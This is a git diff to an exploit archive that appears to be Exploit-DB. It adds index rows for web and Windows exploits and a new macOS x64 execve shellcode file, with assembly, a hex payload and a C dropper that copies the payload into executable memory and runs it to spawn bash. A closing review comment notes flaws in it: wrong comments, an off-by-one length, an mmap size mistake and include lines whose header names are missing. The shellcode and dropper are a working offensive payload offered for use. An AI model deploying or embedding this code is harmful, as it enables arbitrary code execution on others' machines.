 35522,exploits/php/webapps/35522.txt,"Spitfire 1.0.3x - 'cms_username' Cross-Site Scripting",2011-03-29,"High-Tech Bridge SA",webapps,php,,2011-03-29,2014-12-15,1,,,,,,https://www.securityfocus.com/bid/47077/info
+51162,exploits/php/webapps/51162.txt,"Spitfire CMS 1.0.475 - PHP Object Injection",2023-03-31,LiquidWorm,webapps,php,,2023-03-31,2023-03-31,0,,,,,,
 27601,exploits/php/webapps/27601.txt,"Spitfire CMS 1.1.4 - Cross-Site Request Forgery",2013-08-15,"Yashar shahinzadeh",webapps,php,,2013-08-15,2013-08-15,0,OSVDB-66409,,,,,
 32554,exploits/php/webapps/32554.txt,"SpitFire Photo Pro - 'pages.php' SQL Injection",2008-10-31,"Beenu Arora",webapps,php,,2008-10-31,2014-03-27,1,OSVDB-106996,,,,,https://www.securityfocus.com/bid/32012/info
 21514,exploits/php/webapps/21514.txt,"Splatt Forum 3.0 - Image Tag HTML Injection",2002-06-06,MegaHz,webapps,php,,2002-06-06,2012-09-24,1,CVE-2002-0959;OSVDB-9233,,,,,https://www.securityfocus.com/bid/4953/info
@@ -30216,6 +30227,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36489,exploits/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Cross-Site Scripting",2012-01-04,"Jonathan Claudius",webapps,php,,2012-01-04,2015-03-25,1,CVE-2011-5019;OSVDB-78133,,,,,https://www.securityfocus.com/bid/51254/info
 44277,exploits/php/webapps/44277.txt,"TextPattern 4.6.2 - 'qty' SQL Injection",2018-03-12,"Manuel García Cárdenas",webapps,php,,2018-03-12,2018-03-12,0,CVE-2018-7474,,,,,
 49620,exploits/php/webapps/49620.py,"Textpattern 4.8.3 - Remote code execution (Authenticated) (2)",2021-03-04,"Ricardo Ruiz",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
+51176,exploits/php/webapps/51176.txt,"Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)",2023-03-31,"Alperen Ergel",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
 14823,exploits/php/webapps/14823.txt,"textpattern CMS 4.2.0 - Remote File Inclusion",2010-08-28,Sn!pEr.S!Te,webapps,php,,2010-08-28,2010-08-28,0,CVE-2010-3205;OSVDB-67800,,,,http://www.exploit-db.comtextpattern-4.2.0.tar.gz,
 48861,exploits/php/webapps/48861.txt,"Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting",2020-10-07,"Alperen Ergel",webapps,php,,2020-10-07,2020-10-07,0,,,,,,
 48907,exploits/php/webapps/48907.txt,"Textpattern CMS 4.6.2 - Cross-site Request Forgery",2020-10-19,"Alperen Ergel",webapps,php,,2020-10-19,2020-10-19,0,,,,,,
@@ -32096,6 +32108,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49154,exploits/php/webapps/49154.py,"WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution",2020-12-02,zetc0de,webapps,php,,2020-12-02,2021-04-21,0,CVE-2020-35313,,,,,
 1982,exploits/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Inclusion",2006-07-04,OLiBekaS,webapps,php,,2006-07-03,,1,OSVDB-34426;CVE-2006-3422,,,,,
 44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,,2018-04-09,2018-04-09,0,,,,,,
+51156,exploits/php/webapps/51156.txt,"WooCommerce v7.1.0 - Remote Code Execution(RCE)",2023-03-31,"Milad karimi",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
 12576,exploits/php/webapps/12576.txt,"Woodall Creative - SQL Injection",2010-05-11,XroGuE,webapps,php,,2010-05-10,,1,,,,,,
 50456,exploits/php/webapps/50456.js,"Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)",2021-10-25,samguy,webapps,php,,2021-10-25,2021-10-25,1,,,,,,
 49512,exploits/php/webapps/49512.py,"WordPress 5.0.0 - Image Remote Code Execution",2021-02-01,"OUSSAMA RAHALI",webapps,php,,2021-02-01,2021-02-01,0,CVE-2019-89242,,,,,
@@ -39240,6 +39253,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50764,exploits/windows/local/50764.txt,"Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path",2022-02-18,SamAlucard,local,windows,,2022-02-18,2022-02-18,0,,,,,,
 50690,exploits/windows/local/50690.txt,"CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path",2022-02-02,"Angel Canseco",local,windows,,2022-02-02,2022-02-02,0,,,,,,
 47645,exploits/windows/local/47645.py,"Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)",2019-11-12,sasaga92,local,windows,,2019-11-12,2019-11-12,0,,,,,,
+51159,exploits/windows/local/51159.txt,"CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path",2023-03-31,"Damian Semon Jr",local,windows,,2023-03-31,2023-03-31,0,,,,,,
 39594,exploits/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - '.m3u' Local Stack Overflow",2016-03-22,"Charley Celice",local,windows,,2016-03-22,2016-03-23,1,,,,http://www.exploit-db.com/screenshots/idlt40000/screen-shot-2016-03-23-at-150050.png,http://www.exploit-db.comCoolPlayer219_Bin.zip,
 4839,exploits/windows/local/4839.pl,"CoolPlayer 2.17 - '.m3u' Local Stack Overflow",2008-01-05,Trancek,local,windows,,2008-01-04,2016-11-14,1,CVE-2006-6288,,,,http://www.exploit-db.comCoolPlayer217_Bin.zip,
 6157,exploits/windows/local/6157.pl,"CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow",2008-07-29,"Guido Landi",local,windows,,2008-07-28,2016-12-14,1,OSVDB-47194;CVE-2008-3408,,,,,
@@ -40926,6 +40940,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8624,exploits/windows/local/8624.pl,"Soritong MP3 Player 1.0 - Local Buffer Overflow (SEH)",2009-05-07,Stack,local,windows,,2009-05-06,,1,OSVDB-54562;CVE-2009-1643,,,,http://www.exploit-db.comsoritong10.exe,
 44896,exploits/windows/local/44896.vb,"Soroush IM Desktop App 0.15 (beta) - Authentication Bypass",2018-06-15,VortexNeoX64,local,windows,,2018-06-15,2018-06-19,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,http://www.exploit-db.comSoroush-0.15.0.exe,
 45171,exploits/windows/local/45171.vb,"Soroush IM Desktop App 0.17.0 - Authentication Bypass",2018-08-09,VortexNeoX64,local,windows,,2018-08-09,2018-09-04,0,,,,,http://www.exploit-db.comSoroushSetup0.17.0(1).exe,
+51170,exploits/windows/local/51170.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS)",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
+51169,exploits/windows/local/51169.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR)",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
+51171,exploits/windows/local/51171.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
+51168,exploits/windows/local/51168.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
+51172,exploits/windows/local/51172.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
+51173,exploits/windows/local/51173.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE)",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
+51174,exploits/windows/local/51174.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
+51167,exploits/windows/local/51167.txt,"SOUND4 Server Service 4.1.102 - Local Privilege Escalation",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
 9970,exploits/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Local Privilege Escalation",2009-10-20,bellick,local,windows,,2009-10-19,,1,,,,,,
 11264,exploits/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,local,windows,,2010-01-25,2010-06-27,0,CVE-2009-4606;OSVDB-59080,,,,http://www.exploit-db.comwebdrive.exe,
 49679,exploits/windows/local/49679.txt,"SOYAL 701 Client 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,,2021-03-19,2021-03-19,0,,,,,,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 51216d82f..06b6c2313 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -831,6 +831,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 46397,shellcodes/macos/46397.c,"Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",,macos,31,2019-02-18,2019-05-23,0,,,,,,
 46395,shellcodes/macos/46395.c,"Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",,macos,103,2019-02-18,2019-02-18,0,,,,,,
 46393,shellcodes/macos/46393.c,"Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",,macos,119,2019-02-18,2019-05-23,0,,,,,,
+51177,shellcodes/macos/51177.txt,"macOS/x64 - Execve Null-Free Shellcode",2023-03-31,boku,,macos,253,2023-03-31,2023-03-31,0,,,,,,
 39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator)",2016-06-06,odzhancode,,multiple,194,2016-06-16,2018-01-21,1,,,,http://www.exploit-db.com/screenshots/idlt40000/screen-shot-2016-06-16-at-80737-am.png,,
 13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,dymitri,,multiple,38,2004-09-11,,1,,,,,,
 13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",,multiple,99,2005-11-14,,1,,,,,,
diff --git a/shellcodes/macos/51177.txt b/shellcodes/macos/51177.txt
new file mode 100644
index 000000000..ae52076d1
--- /dev/null
+++ b/shellcodes/macos/51177.txt
@@ -0,0 +1,216 @@
+# Shellcode Title: macOS/x64 - Execve Null-Free Shellcode (253 Bytes)
+# Shellcode Author: Bobby Cooke (boku) @0xBoku github.com/boku7
+# Date: 12/20/2022
+# Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x86_64
+# Shellcode Description:
+# macOS 64 bit shellcode. Uses execve syscall to spawn bash. The string is within the shellcode. The shellcode finds the string in memory, copies the string to the stack, and then changes the string terminator to 0x00.
+# Shoutout to IBM X-Force Red Adversary Simulation team! Currently working through EXP-312 and tinkering with macOS shellcoding. Shoutout to the offsec team for the cool course!
+# Compile & run:
+# nasm -f macho64 execve.asm -o execve
+# for x in $(objdump -d execve --x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo
+# # Add shellcode to dropper.c
+# gcc dropper.c -o dropper
+# sh-3.2$ pstree -p $(echo $$) | grep $$
+# \-+= 56862 bobby sh
+# sh-3.2$ ./dropper
+# [+] Shellcode Length: 253 Bytes
+# [+] Copying shellcode from variable at 0x10e4fde00 to allocated RWX memory at 0x10e643000
+# [+] Executing shellcode at 0x10e643000
+# bobby$ pstree -p $(echo $$) | grep -B1 $$
+# \-+= 56862 bobby sh
+# \-+= 57021 bobby (bash)
+
+bits 64
+global _main
+
+_main:
+ create_stackframe:
+ push rbp ; push current base pointer to the stack
+ mov rbp, rsp ; Set Base Stack Pointer for new Stack-Frame
+ sub rsp, 0x60 ; create space for string
+ mov [rbp-0x8], rsp ; Save destination string buffer address
+ jmp short lilypad_1
+
+; char * string eggHunter(egg);
+; RAX RDI
+; description: starts searching for the supplied egg starting from the callers return address
+eggHunter:
+ mov rcx, [rsp] ; start the egghunter from the caller function return address
+ hunt:
+ inc rcx ; move to the hunter to the next byte
+ cmp [rcx], di ; did we find the first egg?
+ jne hunt ; if not, continue hunt
+
+ add cx, 0x2 ; move hunter to 2nd egg location
+ cmp [rcx], di ; did we find the second egg?
+ jne hunt ; if not, continue hunt
+
+ add cx, 0x2 ; both eggs found! Move hunter +2 to return the start of buffer addr
+ xchg rax, rcx ; return start of string address
+ ret
+
+; int length strsize(&string, terminator);
+; RAX RDI RSI
+; description: gets string size of a string that is terminated with a predetermined non-null byte. Terminator byte not included.
+strsize:
+ xor rax, rax ; clear register
+ xor rcx, rcx ; set the counter to zero
+ strsize_loop:
+ mov rcx, rdi ; start of string address
+ add rcx, rax ; current memory location of char in string
+ cmp [rcx], sil ; is this the null terminator?
+ je strsize_return
+ prevent_infinite_loop:
+ cmp ax, 0x1001 ; compare value in RAX to 0x1001 (prevent infinite mem scanning)
+ jg strsize_fail2find ; if value in RAX is greater, jump to label
+ inc rax ; move to the next char in the string
+ jmp strsize_loop
+ strsize_fail2find:
+ xor rax, rax ; return null/ 0x0
+ strsize_return:
+ ret
+
+lilypad_1:
+ jmp short lilypad_2
+
+; char * string terminateString(&string, terminator);
+; RAX RDI RSI
+; description: Finds the string terminator and changes it to a null byte
+terminateString:
+ xor rcx, rcx ; set the counter to zero
+ mov rcx, rdi ; start address to look for terminator
+ loop_find_terminator:
+ cmp [rcx], sil ; is this the null terminator?
+ je found_terminator
+ inc rcx ; move to the next char in the string
+ jmp loop_find_terminator
+ found_terminator:
+ mov [rcx], al
+ ret
+
+; void * dst_addr move_memory(void *dst_addr, void *src_addr, size_t mem_size);
+; RAX RDI RSI RDX
+; description: Move memory from source address to destination address
+; ARG1 - RDI: destination address
+; ARG2 - RSI: source address
+; ARG3 - RDX: size of the memory
+move_memory:
+ ; Loop through memory and move each byte from source to destination
+ push rdi ; save the destination address so we can return it at the end
+ xor rax, rax ; register to temporarily hold the byte we are copying
+ move_memory_loop:
+ mov al, [rsi] ; read the byte from source address into the temporary register
+ mov [rdi], al ; write the byte at the destination address
+ inc rsi ; increment source address
+ inc rdi ; increment destination address
+ dec rdx ; decrement memory size
+ jnz move_memory_loop ; repeat loop until memory size is 0
+ ; Return to caller
+ pop rax ; return the destination address of the memory to the caller
+ ret
+
+lilypad_2:
+ jmp short lilypad_3
+
+; void clear_memory(void *dst_addr, size_t mem_size);
+; RDI RSI
+; description: Writes 0x00 bytes to a destination address
+; ARG1 - RDI: a pointer to the destination address
+; ARG2 - RSI: the size of the memory to be written to
+clear_memory:
+ mov rcx, rsi ; load memory size from second argument into rcx
+ xor rax, rax
+ ; Loop through memory and write 0x00 to each byte in destination address
+ clrmem_loop:
+ mov byte [rdi], al ; write 0x00 to byte in destination address
+ inc rdi ; increment destination address
+ dec rcx ; decrement memory size
+ jnz clrmem_loop ; repeat loop until memory size is 0
+ ; Return to caller
+ ret
+
+lilypad_3:
+ ; *string = eggHunter(egg); Starts hunt from return address of caller
+ find_execve_string:
+ xor rdi, rdi ; clear register
+ mov di, 0xBCB0 ; Arg 1: Our egg
+ call eggHunter ; returns string start address
+ mov [rbp-0x10], rax ; Save string address
+
+ get_strlen:
+ mov rdi, [rbp-0x10] ; Arg 1: string start address
+ xor rsi, rsi ; clear register
+ mov sil, 0xFF ; Arg 2: string terminator
+ call strsize ; returns string size
+ mov [rbp-0x18], rax ; Save string size
+
+ ; move_memory(dst_addr, src_addr, mem_size);
+ ; RDI RSI RDX
+ copy_str2stack:
+ mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack
+ mov rsi, [rbp-0x10] ; Arg 2: Original string location
+ mov rdx, [rbp-0x18] ; Arg 3: size
+ call move_memory
+
+ do_terminate_string:
+ mov rdx, [rbp-0x18] ; string size
+ mov rdi, [rbp-0x8] ; String buffer on stack
+ add rdi, rdx ; Arg 1: string terminator location
+ xor rsi, rsi ; clear register
+ mov sil, 0x1 ; Arg 2: mem size to null
+ call clear_memory ; returns string size
+
+ ; execve("/bin/bash",NULL,NULL)
+ execve:
+ mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack
+ xor rsi, rsi ; Arg 2: NULL
+ xor rdx, rdx ; Arg 3: NULL
+ xor rax, rax ; clear register for syscall number setup
+ mov al, 0x2 ; set a bit in register
+ ror rax, 0x28 ; move the bit over 28 bits to the right in the register
+ mov al, 0x3b ; set the lower byte (AL) of the RAX register to the execve syscall number
+ syscall ; do syscall interrupt
+
+ fixstack:
+ add rsp, 0x60 ; clear allocated stack space
+ pop rbp ; restore stack base pointer
+ ret ; return to caller
+
+shell_path_string: db 0xB0,0xBC,0xB0,0xBC,"/bin/bash",0xFF
+
+###########################################################################################################################################
+
+// dropper.c
+
+#include
+#include
+#include
+#include
+int (*execute_shellcode)();
+
+const unsigned char shellcode[] =
+"\x55\x48\x89\xe5\x48\x83\xec\x60\x48\x89\x65\xf8\xeb\x3c\x48\x8b\x0c\x24\x48\xff\xc1\x66\x39\x39\x75\xf8\x66\x83\xc1\x02\x66\x39\x39\x75\xef\x66\x83\xc1\x02\x48\x91\xc3\x48\x31\xc0\x48\x31\xc9\x48\x89\xf9\x48\x01\xc1\x40\x38\x31\x74\x0e\x66\x3d\x01\x10\x7f\x05\x48\xff\xc0\xeb\xea\x48\x31\xc0\xc3\xeb\x28\x48\x31\xc9\x48\x89\xf9\x40\x38\x31\x74\x05\x48\xff\xc1\xeb\xf6\x88\x01\xc3\x57\x48\x31\xc0\x8a\x06\x88\x07\x48\xff\xc6\x48\xff\xc7\x48\xff\xca\x75\xf1\x58\xc3\xeb\x11\x48\x89\xf1\x48\x31\xc0\x88\x07\x48\xff\xc7\x48\xff\xc9\x75\xf6\xc3\x48\x31\xff\x66\xbf\xb0\xbc\xe8\x7b\xff\xff\xff\x48\x89\x45\xf0\x48\x8b\x7d\xf0\x48\x31\xf6\x40\xb6\xff\xe8\x84\xff\xff\xff\x48\x89\x45\xe8\x48\x8b\x7d\xf8\x48\x8b\x75\xf0\x48\x8b\x55\xe8\xe8\xa4\xff\xff\xff\x48\x8b\x55\xe8\x48\x8b\x7d\xf8\x48\x01\xd7\x48\x31\xf6\x40\xb6\x01\xe8\xa5\xff\xff\xff\x48\x8b\x7d\xf8\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05\x48\x83\xc4\x60\x5d\xc3\xb0\xbc\xb0\xbc\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\xff";
+
+
+int main() {
+ size_t shellcode_size = sizeof(shellcode);
+
+ printf("[+] Shellcode Length: %lu Bytes\n", shellcode_size);
+
+ void *rwx_memory = mmap(0, 0x1024, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+ if (rwx_memory == MAP_FAILED) {
+ printf("[!] Failed to allocate RWX memory\n");
+ perror("mmap");
+ exit(-1);
+ }
+
+ printf("[+] Copying shellcode from variable at %p to allocated RWX memory at %p\n",shellcode,rwx_memory);
+ memcpy(rwx_memory, shellcode, sizeof(shellcode));
+ execute_shellcode = rwx_memory;
+
+ printf("[+] Executing shellcode at %p\n",rwx_memory);
+ execute_shellcode();
+ return 0;
+
+}
\ No newline at end of file
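Review bot: `terminateString` (the routine between `lilypad_1` and `lilypad_2`) is defined but never called — `do_terminate_string` calls `clear_memory` with `sil = 0x1` instead — so its header should say it is unused or the routine should be dropped from the listing. Two comments mislead the reader: `ror rax, 0x28` says "28 bits" but the immediate 0x28 is 40, and `call clear_memory ; returns string size` is copied from the `strsize` call and should read `; writes 0x00 over the 0xFF terminator`. In dropper.c, `sizeof(shellcode)` includes the string literal's terminating NUL, so the printed length (and the 253 in the title and CSV entry) appears to be one more than the null-free payload itself; `%zu`, not `%lu`, is the specifier for a `size_t`, and `mmap(0, 0x1024, ...)` looks like a hex/decimal mix-up (0x1024 is 4132 bytes) where `0x1000` was probably intended. The four `#include` lines read bare `#include` here, which looks like the header names were lost in rendering and is worth checking against the original file.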